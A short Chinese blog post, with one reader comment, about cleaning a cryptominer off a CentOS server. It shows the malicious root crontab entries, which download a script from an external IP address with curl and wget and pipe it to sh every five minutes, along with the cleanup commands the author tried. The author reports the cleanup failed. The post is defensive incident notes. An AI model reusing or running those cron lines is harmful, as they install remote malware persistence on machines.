CentOS 服务器遇到挖矿程序

背景

服务器好久不登录,近期登陆时发现特别卡,于是使用 top 命令查看进程信息,发现有一个进程占用了 90% 以上的 CPU 资源,则登陆阿里云服务器发现漏洞警告,发现这个进程是在挖矿。
记一次 Centos 被挖矿处理过程

讲解

通常这种挖矿病毒,简单的 kill 和把进程的所在文件夹删除掉都不能起到斩草除根的效果,因这种病毒都会在服务器中创建一个定时脚本,每一段时间会检测病毒脚本是否被杀死了,如果杀死了并且可执行文件也被删除了,那么它就会自动下载源程序并且启动执行脚本。所以解决问题根本所在就是将定时任务删除掉,在将该进程杀掉才能起到效果。

解决

一、使用 cat /var/spool/cron/crontabs/root 查看定时任务内容

cat  /var/spool/cron/crontabs/root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

可以看出来它有两个任务,删除 /var/spool/cron 下的内容

 rm -fr  /var/spool/cron/

二、删除进程和执行脚本
执行脚本路径使用 ps 命令来查看

[root@izbp11bmmclnlx35st0s3rz ~]# ps 31688
  PID TTY      STAT   TIME COMMAND
31688 ?        Ssl   11:07 /tmp/Macron

最后还是没有解决,和阿里云沟通结果:建议您重装系统呢。

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 1

我有个问题, 他是怎么给你加的定时任务的?这么厉害,

3周前 评论

请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!